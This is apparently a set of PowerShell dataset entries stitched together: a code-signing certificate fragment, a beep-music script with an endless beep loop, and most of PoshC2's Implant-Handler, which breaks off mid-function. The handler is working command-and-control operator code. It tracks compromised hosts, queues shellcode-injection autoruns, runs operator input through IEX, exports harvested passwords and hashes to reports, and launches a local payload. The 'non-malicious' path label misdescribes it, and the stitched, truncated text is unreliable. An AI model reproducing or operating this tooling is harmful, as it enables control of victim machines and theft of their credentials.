# CSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9u
# MRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp
# b24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMB4XDTI0
# MDcyNTE4MzExM1oXDTI1MTAyMjE4MzExM1owgdMxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w
# ZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjU3MUEt
# MDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNl
# MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAqMJWQeWAq4LwvSjYsjP0
# Uvhvm0j0aAOJiMLg0sLfxKoTXAdKD6oMuq5rF5oEiOxV+9ox0H95Q8fhoZq3x9lx
# guZyTOK4l2xtcgtJCtjXRllM2bTpjOg35RUrBy0cAloBU9GJBs7LBNrcbH6rBiOv
# qDQNicPRZwq16xyjMidU1J1AJuat9yLn7taifoD58blYEcBvkj5dH1la9zU846QD
# eOoRO6NcqHLsDx8/zVKZxP30mW6Y7RMsqtB8cGCgGwVVurOnaNLXs31qTRTyVHX8
# ppOdoSihCXeqebgJCRzG8zG/e/k0oaBjFFGl+8uFELwCyh4wK9Z5+azTzfa2GD4p
# 6ihtskXs3lnW05UKfDJhAADt6viOc0Rk/c8zOiqzh0lKpf/eWUY2o/hvcDPZNgLa
# HvyfDqb8AWaKvO36iRZSXqhSw8SxJo0TCpsbCjmtx0LpHnqbb1UF7cq09kCcfWTD
# PcN12pbYLqck0bIIfPKbc7HnrkNQks/mSbVZTnDyT3O8zF9q4DCfWesSr1akycDd
# uGxCdKBvgtJh1YxDq1skTweYx5iAWXnB7KMyls3WQZbTubTCLLt8Xn8t+slcKm5D
# kvobubmHSriuTA3wTyIy4FxamTKm0VDu9mWds8MtjUSJVwNVVlBXaQ3ZMcVjijyV
# oUNVuBY9McwYcIQK62wQ20ECAwEAAaOCAUkwggFFMB0GA1UdDgQWBBRHVSGYUNQ3
# RwOl71zIAuUjIKg1KjAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBf
# BgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz
# L2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmww
# bAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29m
# dC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0El
# MjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUF
# BwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAwzoIKOY2dnUj
# fWuMiGoz/ovoc1e86VwWaZNFdgRmOoQuRe4nLdtZONtTHNk3Sj3nkyBszzxSbZEQ
# 0DduyKHHI5P8V87jFttGnlR0wPP22FAebbvAbutkMMVQMFzhVBWiWD0VAnu9x0fj
# ifLKDAVXLwoun5rCFqwbasXFc7H/0DPiC+DBn3tUxefvcxUCys4+DC3s8CYp7WWX
# pZ8Wb/vdBhDliHmB7pWcmsB83uc4/P2GmAI3HMkOEu7fCaSYoQhouWOr07l/KM4T
# ndylIirm8f2WwXQcFEzmUvISM6ludUwGlVNfTTJUq2bTDEd3tlDKtV9AUY3rrnFw
# HTwJryLtT4IFhvgBfND3mL1eeSakKf7xTII4Jyt15SXhHd5oI/XGjSgykgJrWA57
# rGnAC7ru3/ZbFNCMK/Jj6X8X4L6mBOYa2NGKwH4A37YGDrecJ/qXXWUYvfLYqHGf
# 8ThYl12Yg1rwSKpWLolA/B1eqBw4TRcvVY0IvNNi5sm+//HJ9Aw6NJuR/uDR7X7v
# DXicpXMlRNgFMyADb8AFIvQPdHqcRpRorY+YUGlvzeJx/2gNYyezAokbrFhACsJ2
# BfyeLyCEo6AuwEHn511PKE8dK4JvlmLSoHj7VFR3NHDk3zRkx0ExkmF8aOdpvoKh
# uwBCxoZ/JhbzSzrvZ74GVjKKIyt5FA0wggdxMIIFWaADAgECAhMzAAAAFcXna54C
# m0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UE
# CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z
# b2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZp
# Y2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMy
# MjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
# EwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNV
# BAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0B
# AQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51
# yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY
# 6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9
# cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN
# 7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDua
# Rr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74
# kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2
# K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5
# TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZk
# i1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9Q
# BXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3Pmri
# Lq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUC
# BBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJl
# pxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIB
# FjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9y
# eS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUA
# YgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU
# 1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2Ny
# bC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIw
# MTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0w
# Ni0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/yp
# b+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulm
# ZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM
# 9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECW
# OKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4
# FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3Uw
# xTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPX
# fx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVX
# VAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGC
# onsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU
# 5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEG
# ahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHWMIHTMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsTHm5TaGllbGQgVFNTIEVT
# Tjo1NzFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAg
# U2VydmljZaIjCgEBMAcGBSsOAwIaAxUABHHn7NCGusZz2RfVbyuwYwPykBWggYMw
# gYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYD
# VQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQsF
# AAIFAOrJT0swIhgPMjAyNDEwMjcyMzQ2MTlaGA8yMDI0MTAyODIzNDYxOVowdzA9
# BgorBgEEAYRZCgQBMS8wLTAKAgUA6slPSwIBADAKAgEAAgINvAIB/zAHAgEAAgIU
# vzAKAgUA6sqgywIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAow
# CAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBCwUAA4IBAQCt9+78tOBk
# 3G7InFWNeSnv+gNf7827NofcCXCIrLQa834+WZOE6YjVcA8B4zRZWYQt61ryjsP7
# nO4QK9AT7twzBe+cVhqFCO+umtt9HILo/02fBvZqGhC0aABNMEKKtN5mHLc0RqyR
# jYVeyJJgW3o+AuIAomNefMMnMlPFbCzeVx+VWfowu6aZGIf20olcJr1Udx5TxmnY
# dsKjQyDDl6Lmtl54TbeWFF6Uai0RRHKqDZXeiYK0nnazQchF9LlhnVpwArQ160lu
# nLrYsrAoYdqLC+X0Bz+PmzShMHudHvUpm9HSYaJSjBDw/SBZA3RVy2I0EMGwb608
# ErihFwOktb8UMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENB
# IDIwMTACEzMAAAH7y8tsN2flMJUAAQAAAfswDQYJYIZIAWUDBAIBBQCgggFKMBoG
# CSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQxIgQgGe4WHtD9
# TDuFopgGSGLYmlE3TRQat2xI2qYvQkBw7towgfoGCyqGSIb3DQEJEAIvMYHqMIHn
# MIHkMIG9BCA52wKr/KCFlVNYiWsCLsB4qhjEYEP3xHqYqDu1SSTlGDCBmDCBgKR+
# MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS
# ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT
# HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB+8vLbDdn5TCVAAEA
# AAH7MCIEIOcOJM95z1rtLRPImI9GcCxcLV/lXPRviSc4qDRq2ZeFMA0GCSqGSIb3
# DQEBCwUABIICAEj/R3K3rvqaP5rngyua4ivumX5IexX+L32mUtKyASx/cnP76BBU
# tSV312cjOdK7w6ILJkuUzz2VMHRv6zuntWjt7ChhgJEoZfi5UTYGzB2jDFG3kp+h
# HqtgYlhKydQaEu86CImDwkOgCQzVtruSb2qiLUR1WM9f/Bp0HpltfKo0e07/3dkP
# 0vrwweQuoJuHOViRkEK7vG7S6/9LX16y5gz/bkDAkT0X16dxOo8Z873BJQp9PC+i
# 3py0logoyDL13pCcNuTJ8+smEmtG+T9+y/bQMydgHHJRHvFGXu8h+LyC68Kne6Zk
# 8EABYIRPsuina5cXbJq8dvqPTdB2vSWJcmet46IuM+4Ja+F2QleBiaN3wkYZnjPj
# SrosJtFNZaha4t2J+0cByQmBFbsUUqu5a1TS4X7VpEtyA/sWaKb0U9YVUs44OFeX
# aSjbOcWROkxwQbWMeerTuc0yl7T6PtJteInrAjATmuN3cvbIk8km4jLfjRDBwCng
# RB1ekZF7KS9kiC5lEJTCSXux/NBAAQeX0fdQQ+Zg5a1rUJAzUQMuNUNps86wtdnj
# S381D3zGkvTIqmiSz/QmS3bICJkBh0hMJICMpYXDoHedxX6V6ExYNaVQOP6mc0Qm
# V/59KXAesndyZTA7aV2WG0rqwOp1R4A0dXaSV5FDPXVaQmOKJVRQmi+I
# SIG # End signature block
|
combined_dataset/train/non-malicious/1590.ps1
|
1590.ps1
|
.{
$one = @((1320,500),(990,250),(1056,250),(1188,250),(1320,125),(1188,125),(1056,250),(990,250),(880,500),(880,250),(1056,250),(1320,500),(1188,250),(1056,250),(990,750),(1056,250),(1188,500),(1320,500),(1056,500),(880,500),(880,500))
$two = @((1188,500),(1408,250),(1760,500),(1584,250),(1408,250),(1320,750),(1056,250),(1320,500),(1188,250),(1056,250),(990,500),(990,250),(1056,250),(1188,500),(1320,500),(1056,500),(880,500),(880,500))
$three = @((660,1000),(528,1000),(594,1000),(495,1000),(528,1000),(440,1000),(419,1000),(495,1000),(660,1000),(528,1000),(594,1000),(495,1000),(528,500),(660,500),(880,1000),(838,2000),(660,1000),(528,1000),(594,1000),(495,1000),(528,1000),(440,1000),(419,1000),(495,1000),(660,1000),(528,1000),(594,1000),(495,1000),(528,500),(660,500),(880,1000),(838,2000))
[Console]::Beep(658,125)
foreach ($N in $one) { [Console]::Beep($N[0],$N[1]) }
Sleep -M 250
foreach ($N in $two) { [Console]::Beep($N[0],$N[1]) }
Sleep -M 500
foreach ($N in $one) { [Console]::Beep($N[0],$N[1]) }
Sleep -M 250
foreach ($N in $two) { [Console]::Beep($N[0],$N[1]) }
Sleep -M 500
foreach ($N in $three) { [Console]::Beep($N[0],$N[1]) }
}
.{
$mario = @((130,100),(262,100),(330,100),(392,100),(523,100),(660,100),(784,300),(660,300),(146,100),(262,100),(311,100),(415,100),(523,100),(622,100),(831,300),(622,300),(155,100),(294,100),(349,100),(466,100),(588,100),(699,100),(933,300),(933,100),(933,100),(933,100),(1047,400))
foreach ($N in $mario) { [Console]::Beep($N[0],$N[1]) }
}
.{
while (1) {
1..2 | % { [console]::beep(3900, 225) }
Start-Sleep -Milliseconds 450
}
}
|
combined_dataset/train/non-malicious/4288.ps1
|
4288.ps1
|
function Implant-Handler
{
[CmdletBinding(DefaultParameterSetName = "FolderPath")]
Param
(
[Parameter(ParameterSetName = "FolderPath", Mandatory = $false)]
[string]
$FolderPath,
[string]
$PoshPath
)
if (!$FolderPath) {
$FolderPath = Read-Host -Prompt `n'Enter the root folder path of the Database/Project'
}
$Database = "$FolderPath\PowershellC2.SQLite"
$p = $env:PsModulePath
$p += ";$PoshPath\"
$global:randomuri = $null
$global:cmdlineinput = 'PS >'
$global:implants = $null
$global:implantid = $null
$global:command = $null
$global:newdir = $FolderPath
[Environment]::SetEnvironmentVariable("PSModulePath",$p)
Import-Module -Name PSSQLite
Import-Module "$PoshPath\Modules\ConvertTo-Shellcode.ps1"
Import-Module "$PoshPath\C2-Payloads.ps1"
$c2serverresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM C2Server" -As PSObject
$defaultbeacon = $c2serverresults.DefaultSleep
$killdatefm = $c2serverresults.KillDate
$IPAddress = $c2serverresults.HostnameIP
$DomainFrontHeader = $c2serverresults.DomainFrontHeader
$ipv4address = $c2serverresults.HostnameIP
$serverport = $c2serverresults.ServerPort
$URLS = $c2serverresults.URLS
$EncKey = $c2serverresults.EncKey
$SocksURLS = $c2serverresults.SocksURLS
$Insecure = $c2serverresults.Insecure
$useragent = $c2serverresults.UserAgent
$Referer = $c2serverresults.Referer
$urlstring = $URLS
$newImplant = $urlstring -split ","
$newImplantURL = $newImplant[0] -replace '"',''
$Host.ui.RawUI.WindowTitle = "PoshC2 Implant Handler: $ipv4address Port $serverport"
$head = '
<style>
body {
font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;
}
table {
table-layout: fixed;
word-wrap: break-word;
display: table;
font-family: monospace;
white-space: pre;
margin: 1em 0;
}
th, td {
text-align: left;
padding: 8px;
}
tr:nth-child(even){background-color:
th {
background-color:
color: white;
}
p {
margin-left: 20px;
font-size: 12px;
}
</style>'
$header = '
<pre>
__________ .__. _________ ________
\_______ \____ _____| |__ \_ ___ \ \_____ \
| ___/ _ \/ ___/ | \ / \ \/ / ____/
| | ( <_> )___ \| Y \ \ \____/ \
|____| \____/____ >___| / \______ /\_______ \
\/ \/ \/ \/
================== www.PoshC2.co.uk ================
====================================================
</pre>'
function startup
{
Clear-Host
$global:implants = $null
$global:command = $null
$global:randomuri = $null
$global:implantid = $null
$dbresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Implants WHERE Alive='Yes'" -As PSObject
$global:implants = $dbresults.RandomURI
while ($global:randomuri -eq $null)
{
Clear-Host
Write-Host -Object ".___. .__. __ " -ForegroundColor Green
Write-Host -Object "| | _____ ______ | | _____ _____/ |_ ______" -ForegroundColor Green
Write-Host -Object "| |/ \\____ \| | \__ \ / \ __\/ ___/" -ForegroundColor Green
Write-Host -Object "| | Y Y \ |_> > |__/ __ \| | \ | \___ \ " -ForegroundColor Green
Write-Host -Object "|___|__|_| / __/|____(____ /___| /__| /____ >" -ForegroundColor Green
Write-Host -Object " \/|__| \/ \/ \/ " -ForegroundColor Green
Write-Host "============== v3.8 www.PoshC2.co.uk =============" -ForegroundColor Green
Write-Host ""
foreach ($implant in $dbresults)
{
$pivotimplant = $null
$randomurihost = $implant.RandomURI
$implantid = $implant.ImplantID
$im_arch = $implant.Arch
$im_user = $implant.User
$im_hostname = $implant.Hostname
$im_lastseen = $implant.LastSeen
$im_pid = $implant.PID
$im_sleep = $implant.Sleep
$im_domain = $implant.Domain
$pivot = $implant.Pivot
if ($pivot -eq "Daisy"){$pivotimplant = " D"}
if ($pivot -eq "Proxy"){$pivotimplant = " P"}
if ($randomurihost) {
if (((get-date).AddMinutes(-10) -gt $implant.LastSeen) -and ((get-date).AddMinutes(-59) -lt $implant.LastSeen)){
Write-Host "[$implantid]: Seen:$im_lastseen | PID:$im_pid | Sleep:$im_sleep | $im_user @ $im_hostname ($im_arch)$($pivotimplant)" -ForegroundColor Yellow
}
elseif ((get-date).AddMinutes(-59) -gt $implant.LastSeen){
Write-Host "[$implantid]: Seen:$im_lastseen | PID:$im_pid | Sleep:$im_sleep | $im_user @ $im_hostname ($im_arch)$($pivotimplant)" -ForegroundColor Red
}
else {
Write-Host "[$implantid]: Seen:$im_lastseen | PID:$im_pid | Sleep:$im_sleep | $im_user @ $im_hostname ($im_arch)$($pivotimplant)" -ForegroundColor Green
}
}
}
if (($HelpOutput) -and ($HelpOutput -eq "PrintMainHelp")){
print-mainhelp
$HelpOutput = $Null
}
if (($HelpOutput) -and ($HelpOutput -ne "PrintMainHelp")){
Write-Host ""
Write-Host $HelpOutput -ForegroundColor Green
$HelpOutput = $Null
}
$global:implantid = Read-Host -Prompt `n'Select ImplantID or ALL or Comma Separated List (Enter to refresh):'
Write-Host -Object ""
if (!$global:implantid)
{
startup
}
if ($global:implantid -eq "Help"){
$HelpOutput = "PrintMainHelp"
startup
}
elseif ($global:implantid -eq "?"){
$HelpOutput = "PrintMainHelp"
startup
}
if ($global:implantid.ToLower().StartsWith("createnewpayload")){
$global:implantid | IEX
$HelpOutput = "Created New Payloads"
}
elseif ($global:implantid.ToLower().StartsWith("set-defaultbeacon"))
{
[int]$Beacon = $global:implantid -replace "set-defaultbeacon ",""
$HelpOutput = "DefaultBeacon updated to: $Beacon"
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE C2Server SET DefaultSleep='$Beacon'"|Out-Null
startup
}
elseif (($global:implantid -eq "automigrate-frompowershell") -or ($global:implantid -eq "AM"))
{
if (Test-Path "$FolderPath\payloads\Posh-shellcode_x86.bin"){
$bytes = (Get-Content "$FolderPath\payloads\Posh-shellcode_x86.bin" -Encoding Byte)
$base64 = [System.Convert]::ToBase64String($bytes)
$bytes_64 = (Get-Content "$FolderPath\payloads\Posh-shellcode_x64.bin" -Encoding Byte)
$base64_64 = [System.Convert]::ToBase64String($bytes_64)
$taskn = "LoadModule Inject-Shellcode.ps1"
$taskp = "`$Shellcode86 = `"$base64`";`$Shellcode64 = `"$base64_64`""
$taskm = "AutoMigrate"
$Query = 'INSERT
INTO AutoRuns (Task)
VALUES (@Task)'
Invoke-SqliteQuery -DataSource $Database -Query $Query -SqlParameters @{
Task = $taskn
}
Invoke-SqliteQuery -DataSource $Database -Query $Query -SqlParameters @{
Task = $taskp
}
Invoke-SqliteQuery -DataSource $Database -Query $Query -SqlParameters @{
Task = $taskm
}
$HelpOutput = "Added automigrate-frompowershell"
startup
} else {
$HelpOutput = "Error cannot find shellcode"
startup
}
}
elseif ($global:implantid -eq "L")
{
$autorunlist = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM AutoRuns" -As PSObject
foreach ($i in $autorunlist) {
$taskid = $i.TaskID
$taskname = $i.Task
$HelpOutput += "TaskID: $taskid | Task: $taskname `n"
}
startup
}
elseif ($global:implantid -eq "list-autorun")
{
$autorunlist = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM AutoRuns" -As PSObject
foreach ($i in $autorunlist) {
$taskid = $i.TaskID
$taskname = $i.Task
$HelpOutput += "TaskID: $taskid | Task: $taskname `n"
}
startup
}
elseif ($global:implantid -eq "nuke-autorun")
{
Invoke-SqliteQuery -DataSource $Database -Query "Drop Table AutoRuns"
$Query = 'CREATE TABLE AutoRuns (
TaskID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
Task TEXT)'
Invoke-SqliteQuery -Query $Query -DataSource $Database
startup
}
elseif ($global:implantid.ToLower().StartsWith("del-autorun"))
{
$number = $global:implantid.Substring(12)
$number = [int]$number
if ($number -match '^\d+$'){
Invoke-SqliteQuery -DataSource $Database -Query "DELETE FROM AutoRuns where TaskID='$number'"
$autorunlist = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM AutoRuns" -As PSObject
foreach ($i in $autorunlist) {
$taskid = $i.TaskID
$taskname = $i.Task
$HelpOutput += "TaskID: $taskid | Task: $taskname"
}
startup
}
else
{
$HelpOutput = "Error not an integer"
startup
}
}
elseif ($global:implantid.ToLower().StartsWith("add-autorun"))
{
$tasker = $global:implantid.Substring(12)
write-host "$tasker" -ForegroundColor Cyan
$Query = 'INSERT
INTO AutoRuns (Task)
VALUES (@Task)'
Invoke-SqliteQuery -DataSource $Database -Query $Query -SqlParameters @{
Task = $tasker
}
$HelpOutput = "Added autorun $tasker"
startup
} elseif ($global:implantid.ToLower().StartsWith("set-clockworksmsapikey")) {
[string]$apikey = $global:implantid -replace "set-clockworksmsapikey ",""
$HelpOutput = "APIKey updated to: $apikey"
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE C2Server SET APIKEY='$apikey'"|Out-Null
startup
} elseif ($global:implantid.ToLower().StartsWith("set-clockworksmsnumber")) {
[string]$MobileNumber = $global:implantid -replace "set-clockworksmsnumber ",""
$HelpOutput = "APIKey updated to: $MobileNumber"
Invoke-SqliteQuery -DataSource $Database -Query "UPDATE C2Server SET MobileNumber='$MobileNumber'"|Out-Null
startup
} elseif ($global:implantid.ToLower().StartsWith("output-to-html"))
{
$allcreds = Invoke-SqliteQuery -Datasource $Database -Query "SELECT * FROM Creds" -As PSObject
$CredsArray = @()
foreach ($cred in $allcreds) {
$CredLog = New-object PSObject | Select CredsID, Username, Password, Hash
$CredLog.CredsID = $cred.CredsID;
$Credlog.Username = $cred.Username;
$CredLog.Password = $cred.Password;
$CredLog.Hash = $cred.Hash;
$CredsArray += $CredLog
}
$CredsArray | ConvertTo-Html -title "<title>Credential List from PoshC2</title>" -Head $head -pre $header -post "<h3>For details, contact X<br>Created by X</h3>" | Out-File "$FolderPath\reports\Creds.html"
$allresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Implants" -As PSObject
$ImplantsArray = @()
foreach ($implantres in $allresults) {
$ImplantLog = New-Object PSObject | Select ImplantID, RandomURI, User, Proxy, Hostname, IPAddress, FirstSeen, LastSeen, PID, Arch, Domain, Sleep
$ImplantLog.ImplantID = $implantres.ImplantID;
$ImplantLog.RandomURI = $implantres.RandomURI;
$ImplantLog.User = $implantres.User;
$ImplantLog.Hostname = $implantres.Hostname;
$ImplantLog.Proxy = $implantres.Proxy;
$ImplantLog.IPAddress = $implantres.IPAddress;
$ImplantLog.FirstSeen = $implantres.FirstSeen;
$ImplantLog.LastSeen = $implantres.LastSeen;
$ImplantLog.PID = $implantres.PID;
$ImplantLog.Arch = $implantres.Arch;
$ImplantLog.Domain = $implantres.Domain;
$ImplantLog.Sleep = $implantres.Sleep;
$ImplantsArray += $ImplantLog
}
$ImplantsArray | ConvertTo-Html -title "<title>Implant List from PoshC2</title>" -Head $head -pre $header -post "<h3>For details, contact X<br>Created by X</h3>" | Out-File "$FolderPath\reports\Implants.html"
$allresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM CompletedTasks" -As PSObject
$TasksArray = @()
foreach ($task in $allresults) {
$ImplantTask = New-Object PSObject | Select TaskID, Timestamp, Hostname, ImplantID, Command, Output
$ImplantTask.TaskID = $task.CompletedTaskID;
$ImplantTask.Timestamp = $task.TaskID;
$ranuri = $task.RandomURI;
$Rest = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM Implants WHERE RandomURI='$ranuri'" -As PSObject
$ImplantTask.Hostname = $Rest.Hostname
$ImplantTask.ImplantID = $Rest.ImplantID;
$ImplantTask.Command = $task.Command;
$ImplantTask.Output = $task.Output;
$TasksArray += $ImplantTask
}
$TasksArray | ConvertTo-Html -title "<title>Tasks from PoshC2</title>" -Head $head -pre $header -post "<h3>For details, contact X<br>Created by X</h3>" | Out-File "$FolderPath\reports\ImplantTasks.html"
$allresults = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM C2Server" -As PSObject
$TasksArray = @()
foreach ($task in $allresults) {
$C2ServerDetails = New-Object PSObject | Select HostnameIP, DomainFrontHeader, KillDate, ServerPort, DownloadURI, URLS
$C2ServerDetails.HostnameIP = $task.HostnameIP;
$C2ServerDetails.DomainFrontHeader = $task.DomainFrontHeader;
$C2ServerDetails.KillDate = $task.KillDate;
$C2ServerDetails.ServerPort = $task.ServerPort;
$C2ServerDetails.DownloadURI = $task.DownloadURI;
$C2ServerDetails.URLS = $task.URLS;
$TasksArray += $C2ServerDetails
}
$TasksArray | ConvertTo-Html -title "<title>PoshC2 Server</title>" -Head $head -pre $header -post "<h3>For details, contact X<br>Created by X</h3>" | Out-File "$FolderPath\reports\C2Server.html"
$HelpOutput = "Created four reports in $FolderPath\reports\*"
} elseif ($global:implantid -eq "P")
{
start-process $FolderPath\payloads\payload.bat
$HelpOutput = "Pwning self......"
$HelpOutput
} elseif ($global:implantid.ToLower().StartsWith("pwnself"))
{
start-process $FolderPath\payloads\payload.bat
$HelpOutput = "Pwning self......"
$HelpOutput
} elseif ($global:implantid.ToLower().StartsWith("history"))
{
$History = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM History" -As PSObject
foreach ($item in $History)
{
$HelpOutput += $item.Command + "`n"
}
} elseif ($global:implantid.ToLower().StartsWith("show-serverinfo"))
{
$item = Invoke-SqliteQuery -DataSource $Database -Query "SELECT * FROM C2Server" -As PSObject
$HelpOutput += "Hostname: $($item.HostnameIP) `n"
